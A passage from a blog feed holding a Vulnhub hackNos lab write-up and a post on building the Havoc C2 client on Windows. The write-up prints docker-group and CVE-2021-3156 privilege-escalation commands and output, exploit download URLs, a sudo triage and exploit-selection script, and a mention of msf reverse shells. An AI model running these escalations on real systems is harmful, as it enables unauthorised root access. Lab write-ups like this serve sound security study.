class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">recon@hacknos:~$ sudo su -</span><br><span class="line">root@hacknos:~# Security@hackNos</span><br><span class="line">Security@hackNos: command not found</span><br><span class="line">root@hacknos:~# ls</span><br><span class="line">root.txt snap</span><br><span class="line">root@hacknos:~# id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br><span class="line">root@hacknos:~# cat root.txt</span><br><span class="line"> $$\ $$$$$$$\ </span><br><span class="line"> \$$\ $$ __$$\ </span><br><span class="line">$$$$\ \$$\ $$ | $$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ </span><br><span class="line">\____| \$$\ $$$$$$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ </span><br><span class="line">$$$$\ $$ | $$ __$$< $$$$$$$$ |$$ / $$ / $$ |$$ | $$ |</span><br><span class="line">\____|$$ / $$ | $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |</span><br><span class="line"> $$ / $$ | $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$ |$$ | $$ |</span><br><span class="line"> \__/ \__| \__| \_______| \_______| \______/ \__| \__|</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">MD5HASH: bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br><span class="line">Author: Rahul Gehlaut</span><br><span class="line"></span><br><span class="line">WebBlog: www.hackNos.com</span><br><span class="line"></span><br><span class="line">Twitter: 
@rahul_gehlaut</span><br></pre></td></tr></table></figure><h3 id="在用户recon身份提权方法二"><a href="#在用户recon身份提权方法二" class="headerlink" title="Privilege escalation as recon, second method"></a>Privilege escalation as recon, second method</h3><p>Use LinEnum to look for anything exploitable:</p><p><a href="https://github.com/rebootuser/LinEnum">https://github.com/rebootuser/LinEnum</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">[-] Any interesting mail in /var/mail:</span><br><span class="line">total 8</span><br><span class="line">drwxrwsr-x 2 root mail 4096 Oct 17 2019 .</span><br><span class="line">drwxr-xr-x 14 root root 4096 Jan 6 2020 ..</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[+] Looks like we're hosting Docker:</span><br><span class="line">Docker version 19.03.2, build 6a30dfca03</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">### SCAN COMPLETE ####################################</span><br></pre></td></tr></table></figure><p>Docker is installed and <code>recon</code> can run <code>docker</code> without sudo, so it can be used to escalate: mount the host root filesystem into a container and chroot into it, and the shell inside is root on the host. Note that the first command below pulls <code>alpine</code> from Docker Hub, so it only works because the target has outbound Internet access (the pull is visible in the transcript).</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">docker images</span><br><span class="line">docker run -v /:/mnt --rm -it alpine chroot /mnt sh</span><br><span class="line">docker run -it -v /:/mbt IMAGE ID</span><br><span class="line">cd /mbt</span><br><span class="line">cat /root/root.txt</span><br></pre></td></tr></table></figure><p>Concretely:</p><figure class="highlight 
plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span 
class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">recon@hacknos:~$ docker images</span><br><span class="line"></span><br><span class="line">REPOSITORY TAG IMAGE ID CREATED SIZE</span><br><span class="line">recon@hacknos:~$ </span><br><span class="line">recon@hacknos:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh</span><br><span class="line">Unable to find image 'alpine:latest' locally</span><br><span class="line">latest: Pulling from library/alpine</span><br><span class="line">a0d0a0d46f8b: Pull complete </span><br><span class="line">Digest: sha256:e1c082e3d3c45cccac829840a25941e679c25d438cc8412c2fa221cf1a824e6a</span><br><span class="line">Status: Downloaded newer image for alpine:latest</span><br><span class="line"># id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)</span><br><span class="line"></span><br><span class="line"># # exit</span><br><span class="line">recon@hacknos:~$ docker run -it -v /:/mbt e7d92cdc71fe</span><br><span class="line">Unable to find image 'e7d92cdc71fe:latest' locally</span><br><span class="line">docker: Error response from daemon: pull access denied for e7d92cdc71fe, repository does not exist or may require 'docker login': denied: requested access to the resource is denied.</span><br><span class="line">See 'docker run --help'.</span><br><span class="line">recon@hacknos:~$ docker iamges</span><br><span class="line">docker: 'iamges' is not a docker command.</span><br><span class="line">See 'docker --help'</span><br><span class="line">recon@hacknos:~$ docker images</span><br><span class="line">REPOSITORY TAG IMAGE ID CREATED SIZE</span><br><span class="line">alpine latest 14119a10abf4 2 weeks ago 5.6MB</span><br><span class="line">recon@hacknos:~$ docker run -it -v /:/mbt 14119a10abf4</span><br><span class="line">/ # id</span><br><span class="line">uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)</span><br><span class="line">/ # ls</span><br><span class="line">bin dev etc home lib mbt media mnt opt proc root run sbin srv sys tmp usr var</span><br><span class="line">/ # cd root/</span><br><span class="line">~ # ls</span><br><span class="line">~ # cd ..</span><br><span class="line">/ # cd /mbt</span><br><span class="line">/mbt # ls</span><br><span class="line">bin dev initrd.img lib32 lost+found opt run srv usr vmlinuz.old</span><br><span class="line">boot etc initrd.img.old lib64 media proc sbin sys var</span><br><span class="line">cdrom home lib libx32 mnt root snap tmp vmlinuz</span><br><span class="line">/mbt # cd root</span><br><span class="line">/mbt/root # ls</span><br><span class="line">root.txt snap</span><br><span class="line">/mbt/root # cat root</span><br><span class="line">cat: can't open 'root': No such file or directory</span><br><span class="line">/mbt/root # cat root.txt</span><br><span class="line"> $$\ $$$$$$$\ </span><br><span class="line"> \$$\ $$ __$$\ </span><br><span class="line">$$$$\ \$$\ $$ | $$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ </span><br><span class="line">\____| \$$\ $$$$$$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ </span><br><span class="line">$$$$\ $$ | $$ __$$< $$$$$$$$ |$$ / $$ / $$ |$$ | $$ |</span><br><span class="line">\____|$$ / $$ | $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |</span><br><span class="line"> $$ / $$ | $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$ |$$ | $$ |</span><br><span class="line"> \__/ \__| \__| \_______| \_______| \______/ \__| \__|</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">MD5HASH: bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br><span class="line">Author: Rahul Gehlaut</span><br><span class="line"></span><br><span class="line">WebBlog: www.hackNos.com</span><br><span 
class="line"></span><br><span class="line">Twitter: @rahul_gehlaut</span><br><span class="line">/mbt/root # </span><br></pre></td></tr></table></figure><h3 id="在www-data身份的提权(CVE-2021-3156)"><a href="#在www-data身份的提权(CVE-2021-3156)" class="headerlink" title="Privilege escalation from www-data (CVE-2021-3156)"></a>Privilege escalation from www-data (CVE-2021-3156)</h3><p>Use <a href="https://github.com/mzet-/linux-exploit-suggester">https://github.com/mzet-/linux-exploit-suggester</a> to look for applicable privilege-escalation exploits (run on the target as <code>exp.sh</code> below):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span 
class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">www-data@hacknos:/var/www/recon/5ecure$ ./exp.sh</span><br><span class="line">./exp.sh</span><br><span class="line"></span><br><span class="line">Available information:</span><br><span class="line"></span><br><span class="line">Kernel version: 5.3.0</span><br><span class="line">Architecture: x86_64</span><br><span class="line">Distribution: ubuntu</span><br><span class="line">Distribution version: 19.10</span><br><span class="line">Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed</span><br><span class="line">Package listing: from current OS</span><br><span class="line"></span><br><span class="line">Searching among:</span><br><span class="line"></span><br><span class="line">78 kernel space exploits</span><br><span class="line">48 user space exploits</span><br><span class="line"></span><br><span class="line">Possible Exploits:</span><br><span class="line"></span><br><span class="line">[+] [CVE-2021-3156] sudo Baron Samedit 2</span><br><span class="line"></span><br><span class="line"> Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt</span><br><span class="line"> Exposure: probable</span><br><span class="line"> Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10</span><br><span class="line"> Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main</span><br><span class="line"></span><br><span class="line">[+] [CVE-2021-3156] sudo Baron Samedit</span><br><span class="line"></span><br><span class="line"> Details: 
https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt</span><br><span class="line"> Exposure: less probable</span><br><span class="line"> Tags: mint=19,ubuntu=18|20, debian=10</span><br><span class="line"> Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main</span><br><span class="line"></span><br><span class="line">[+] [CVE-2021-22555] Netfilter heap out-of-bounds write</span><br><span class="line"></span><br><span class="line"> Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html</span><br><span class="line"> Exposure: less probable</span><br><span class="line"> Tags: ubuntu=20.04{kernel:5.8.0-*}</span><br><span class="line"> Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c</span><br><span class="line"> ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c</span><br><span class="line"> Comments: ip_tables kernel module must be loaded</span><br><span class="line"></span><br><span class="line">[+] [CVE-2019-18634] sudo pwfeedback</span><br><span class="line"></span><br><span class="line"> Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/</span><br><span class="line"> Exposure: less probable</span><br><span class="line"> Tags: mint=19</span><br><span class="line"> Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c</span><br><span class="line"> Comments: sudo configuration requires pwfeedback to be enabled.</span><br><span class="line"></span><br><span class="line">[+] [CVE-2017-5618] setuid screen v4.5.0 LPE</span><br><span class="line"></span><br><span class="line"> Details: https://seclists.org/oss-sec/2017/q1/184</span><br><span class="line"> Exposure: less probable</span><br><span class="line"> Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154</span><br><span 
class="line"></span><br></pre></td></tr></table></figure><p>Here we use <a href="https://github.com/worawit/CVE-2021-3156">worawit/CVE-2021-3156: Sudo Baron Samedit Exploit (github.com)</a>.</p><p>Its README.md explains which script to try in which order (this is the section for distributions whose glibc has no tcache):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">For Linux distribution that glibc has no tcache support:</span><br><span class="line"></span><br><span class="line">if a target is Debian 9, Ubuntu 16.04, or Ubuntu 14.04, try exploit_nss_xxx.py for specific version first</span><br><span class="line">next, try exploit_defaults_mailer.py. If you know a target sudo is compiled with --disable-root-mailer, you can skip this exploit. The exploit attempt to check root mailer flag from sudo binary. But sudo permission on some Linux distribution is 4711 (-rws--x--x) which is impossible to check on target system. 
(Known work OS is CentOS 6 and 7)</span><br><span class="line">last, try exploit_userspec.py</span><br></pre></td></tr></table></figure><p>The target is Ubuntu 19.10, whose glibc (2.30) does have tcache, so the generic <code>exploit_nss.py</code> is the script to try first. It works straight away and gives us a root shell:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">www-data@hacknos:/var/www/recon/5ecure$ ./exploit_nss.py</span><br><span class="line">./exploit_nss.py</span><br><span class="line"># id</span><br><span class="line">id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),33(www-data)</span><br><span class="line"># cat /root/root.txt</span><br><span class="line">cat /root/root.txt</span><br><span class="line"> $$\ $$$$$$$\ </span><br><span class="line"> \$$\ $$ __$$\ </span><br><span class="line">$$$$\ \$$\ $$ | $$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ </span><br><span class="line">\____| \$$\ $$$$$$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ </span><br><span class="line">$$$$\ $$ | $$ __$$< $$$$$$$$ |$$ / $$ / $$ |$$ | $$ |</span><br><span class="line">\____|$$ / $$ | $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |</span><br><span class="line"> $$ / $$ | $$ |\$$$$$$$\ 
 \$$$$$$$\ \$$$$$$ |$$ | $$ |</span><br><span class="line"> \__/ \__| \__| \_______| \_______| \______/ \__| \__|</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">MD5HASH: bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br><span class="line">Author: Rahul Gehlaut</span><br><span class="line"></span><br><span class="line">WebBlog: www.hackNos.com</span><br><span class="line"></span><br><span class="line">Twitter: @rahul_gehlaut</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="注意事项"><a href="#注意事项" class="headerlink" title="Notes"></a>Notes</h1><p>If the webshell cannot be used interactively, get a reverse shell through msf instead; Meterpreter also makes transferring files such as the exploit scripts above straightforward.</p>]]></content>
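A quick triage helper for the sudo step above, added here as an example and not part of the original write-up. Qualys' advisory for CVE-2021-3156 gives a non-destructive test: on an unpatched sudo, `sudoedit -s /` reaches the vulnerable argument-parsing path and fails with `sudoedit: /: not a regular file`, while a patched sudo rejects `-s` for sudoedit and prints its usage text. The functions below classify that output, and pick which script from worawit's repository to try first based on whether the target's glibc has tcache (glibc 2.26 or newer, which Ubuntu 19.10's 2.30 does), mirroring the README ordering quoted above. The strings in the test are constructed; `check_local_sudo` only runs the real command when the script is started with `--live`.

```shell
#!/bin/sh
# Added example (not from the original write-up): triage for CVE-2021-3156.
# Safe to run on a target: sudoedit only inspects the argument and exits;
# no password prompt is reached and nothing is modified.

# Classify the stderr text of `sudoedit -s /`.
#   "not a regular file"  -> the vulnerable parsing path was reached
#   "usage:"              -> sudo rejected -s for sudoedit, i.e. patched
classify_sudoedit_output() {
  case "$1" in
    *"not a regular file"*) echo "likely-vulnerable" ;;
    *usage:*)               echo "likely-patched" ;;
    *)                      echo "unknown" ;;
  esac
}

# Decide whether a glibc version string (e.g. "2.30", the last word printed by
# `ldd --version`) has tcache, which appeared in glibc 2.26.
glibc_has_tcache() {
  major="${1%%.*}"
  rest="${1#*.}"
  minor="${rest%%.*}"
  if [ "$major" -gt 2 ]; then
    return 0
  fi
  if [ "$major" -eq 2 ]; then
    if [ "$minor" -ge 26 ]; then
      return 0
    fi
  fi
  return 1
}

# Map the glibc version to the first script to try from worawit/CVE-2021-3156,
# following the order its README gives: the generic exploit_nss.py needs tcache;
# without tcache the README points to the version-specific exploit_nss_*.py
# (Debian 9, Ubuntu 14.04/16.04) and otherwise to exploit_defaults_mailer.py.
pick_exploit_script() {
  if glibc_has_tcache "$1"; then
    echo "exploit_nss.py"
  else
    echo "exploit_defaults_mailer.py"
  fi
}

# Run the live check against the local sudo and print the verdict.
check_local_sudo() {
  tmp="$(mktemp)"
  sudoedit -s / 2>"$tmp" >/dev/null || true
  out="$(cat "$tmp")"
  rm -f "$tmp"
  classify_sudoedit_output "$out"
}

# Example usage on a target:  sh sudo_triage.sh --live
if [ "${1:-}" = "--live" ]; then
  check_local_sudo
  pick_exploit_script "$(ldd --version | head -n 1 | awk '{print $NF}')"
fi
```

The verdict is a heuristic (a vendor backport can change the wording), so treat "likely-vulnerable" as a reason to try the exploit, not as proof.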
<categories>
<category> Vulnhub </category>
</categories>
<tags>
<tag> Penetration Testing </tag>
<tag> Privilege Escalation </tag>
<tag> Linux </tag>
</tags>
</entry>
<entry>
<title>Havoc-Windows-Client</title>
<link href="/2023/10/21/Havoc-Windows-Client/"/>
<url>/2023/10/21/Havoc-Windows-Client/</url>
<content type="html"><![CDATA[<h1 id="Havoc-win"><a href="#Havoc-win" class="headerlink" title="Havoc-win"></a>Havoc-win</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1. Introduction"></a>1. Introduction</h2><p>Upstream project: <a href="https://github.com/HavocFramework/Havoc">Havoc</a></p><p>I prefer running the client on Windows, so I tried to build it there.</p><h2 id="2、进行编译"><a href="#2、进行编译" class="headerlink" title="2. Building"></a>2. Building</h2><h3 id="2-1、准备编译环境"><a href="#2-1、准备编译环境" class="headerlink" title="2.1 Preparing the build environment"></a>2.1 Preparing the build environment</h3><p>MSYS2 is the most convenient environment for building a Linux-oriented project on Windows:</p><p><a href="https://www.msys2.org/">MSYS2</a></p><p>The client is written in Qt5 and built with CMake. It does not depend on Linux-specific system features, so it can be ported.</p><p>Build requirements:</p><ul><li>python 3.10</li><li>c++20</li><li>Qt 5</li><li>spdlog</li></ul><p>Set up the build environment on Windows with msys2:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># Install the required packages</span><br><span class="line">pacman -S --needed --noconfirm python python-devel mingw-w64-x86_64-qt-creator mingw-w64-x86_64-qt5-static mingw-w64-x86_64-spdlog mingw-w64-x86_64-cmake base-devel mingw-w64-x86_64-toolchain git subversion mercurial mingw-w64-x86_64-nasm mingw-w64-x86_64-lld mingw-w64-x86_64-python3-pkgconfig autoconf automake</span><br><span class="line"></span><br><span class="line"># mingw-w64-x86_64-pkg-config and mingw-w64-x86_64-pkgconf conflict with each other: install exactly one of them</span><br><span class="line"># Option A: pkg-config</span><br><span class="line">pacman -S mingw-w64-x86_64-pkg-config</span><br><span class="line"># Option B: pkgconf (the toolchain group above may already have pulled it in)</span><br><span class="line">pacman -S mingw-w64-x86_64-pkgconf</span><br><span class="line"></span><br><span 
class="line"></span><br></pre></td></tr></table></figure><h3 id="2-2、error-Python-h-No-such-file-or-directory"><a href="#2-2、error-Python-h-No-such-file-or-directory" class="headerlink" title="2.2 error: Python.h: No such file or directory"></a>2.2 error: Python.h: No such file or directory</h3><p>python-devel is already installed:</p><blockquote><p>pacman -S python-devel</p></blockquote><p>and Python.h can be found on disk:</p><blockquote><p>$ find / -name "Python.h"<br>/mingw64/include/python3.10/Python.h<br>/usr/include/python3.10/Python.h</p></blockquote><p>The compiler is simply never told where it is. Edit lines 40-49 of CMakeLists.txt and add an include path for Python.h; the two MSYS-style paths found above do not work here, the absolute Windows path is required:</p><figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(APPLE)</span><br><span class="line"></span><br><span class="line"><span class="keyword">execute_process</span>(<span class="keyword">COMMAND</span> brew --prefix OUTPUT_VARIABLE BREW_PREFIX) <span class="comment">#this because brew install location differs Intel/Apple Silicon macs</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">string</span>(STRIP <span class="variable">${BREW_PREFIX}</span> BREW_PREFIX) <span class="comment">#for some reason this happens: https://gitlab.kitware.com/cmake/cmake/-/issues/22404</span></span><br><span class="line"></span><br><span class="line"><span 
class="keyword">include_directories</span>( <span class="string">"${BREW_PREFIX}/bin/python3.10"</span> )</span><br><span class="line"></span><br><span class="line"><span class="keyword">include_directories</span>( <span class="string">"${BREW_PREFIX}/Frameworks/Python.framework/Headers"</span> )</span><br><span class="line"></span><br><span class="line"><span class="keyword">elseif</span>(UNIX)</span><br><span class="line"></span><br><span class="line"><span class="keyword">include_directories</span>( <span class="variable">${PYTHON_INCLUDE_DIRS}</span> )</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span>()</span><br><span class="line"></span><br><span class="line"><span class="keyword">include_directories</span>( <span class="string">"C:/msys64/mingw64/include/python3.10/"</span> )</span><br><span class="line"></span><br><span class="line"><span class="keyword">endif</span>()</span><br></pre></td></tr></table></figure><h3 id="2-3、error-filesystem"><a href="#2-3、error-filesystem" class="headerlink" title="2.3 error: filesystem"></a>2.3 error: filesystem</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">error: no match for 'operator=' (operand types are 'std::__cxx11::basic_string<char>' and 'std::filesystem::__cxx11::path')</span><br></pre></td></tr></table></figure><p>C++17 added filesystem support to the standard library; before that, C++ programmers had to fall back on the POSIX API or the Windows API for directory operations.</p><ul><li>Compiler requirements: gcc>=8, clang>=7, MSVC>=19.14</li><li>Header: #include &lt;filesystem&gt;, namespace: std::filesystem</li><li>Reference: <a href="https://en.cppreference.com/w/cpp/filesystem">https://en.cppreference.com/w/cpp/filesystem</a></li></ul><p>The gcc here is 12.2.0, which easily meets the requirement:</p><blockquote><p>gcc -v<br>gcc version 12.2.0 (Rev10, Built by MSYS2 project)</p></blockquote><p>So the error is not a missing feature but a type mismatch: <code>Path</code> is a <code>std::string</code>, while <code>std::filesystem::current_path()</code> returns a <code>std::filesystem::path</code>. On POSIX the assignment compiles because <code>path</code> converts implicitly to its <code>string_type</code>, which is <code>std::string</code> there; on Windows <code>string_type</code> is <code>std::wstring</code>, so the conversion no longer matches. (Appending <code>.string()</code> to the returned path would also fix it; the change below instead falls back to the C runtime's <code>getcwd</code>/<code>chdir</code> on Windows.) Make the following change in client\Source\Havoc\Demon\ConsoleInput.cpp:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// First, add the header that declares getcwd/chdir on Windows</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> _WIN32</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><direct.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Three places need this change; search for Command.Path.empty() to find them</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> ( ! 
Command.Path.empty() )</span><br><span class="line"> {</span><br><span class="line"> Path = <span class="built_in">std</span>::filesystem::current_path();</span><br><span class="line"> spdlog::debug( <span class="string">"Set current path to {}"</span>, Command.Path );</span><br><span class="line"> <span class="built_in">std</span>::filesystem::current_path( Command.Path );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"><span class="comment">// Replace the block above with the following</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ( ! Command.Path.empty() )</span><br><span class="line">{</span><br><span class="line">spdlog::debug( <span class="string">"Set current path to {}"</span>, Command.Path );</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> _WIN32</span></span><br><span class="line"><span class="type">char</span> cur_path[<span class="number">256</span>]={<span class="number">0</span>};</span><br><span class="line">getcwd(cur_path,<span class="keyword">sizeof</span>(cur_path));</span><br><span class="line">Path = cur_path;</span><br><span class="line">chdir(Command.Path.c_str());</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">Path = <span class="built_in">std</span>::filesystem::current_path();</span><br><span class="line"><span class="built_in">std</span>::filesystem::current_path( Command.Path );</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="2-4、link-error-undefined"><a href="#2-4、link-error-undefined" class="headerlink" title="2.4 link error: undefined"></a>2.4 link error: undefined</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line">undefined reference to `PyTuple_New'</span><br></pre></td></tr></table></figure><p>Every Python C-API symbol is undefined at link time: PYTHON_LIBRARIES is never populated on Windows, because CMakeLists.txt only searches for the Python libraries in its APPLE and UNIX branches. Change it at line 32 as follows:</p><figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(APPLE)</span><br><span class="line"><span class="keyword">find_package</span>(Python <span class="number">3</span> COMPONENTS Interpreter Development REQUIRED)</span><br><span class="line"><span class="keyword">set</span>(PYTHON_MAJOR $ENV{Python_VERSION_MAJOR})</span><br><span class="line"><span class="keyword">set</span>(PYTHON_MINOR $ENV{Python_VERSION_MINOR})</span><br><span class="line"><span class="keyword">set</span>(PYTHONLIBS_VERSION_STRING <span class="variable">${Python_VERSION}</span>)</span><br><span class="line"><span class="keyword">set</span>(PYTHON_INCLUDE_DIR <span class="variable">${Python_INCLUDE_DIRS}</span>)</span><br><span 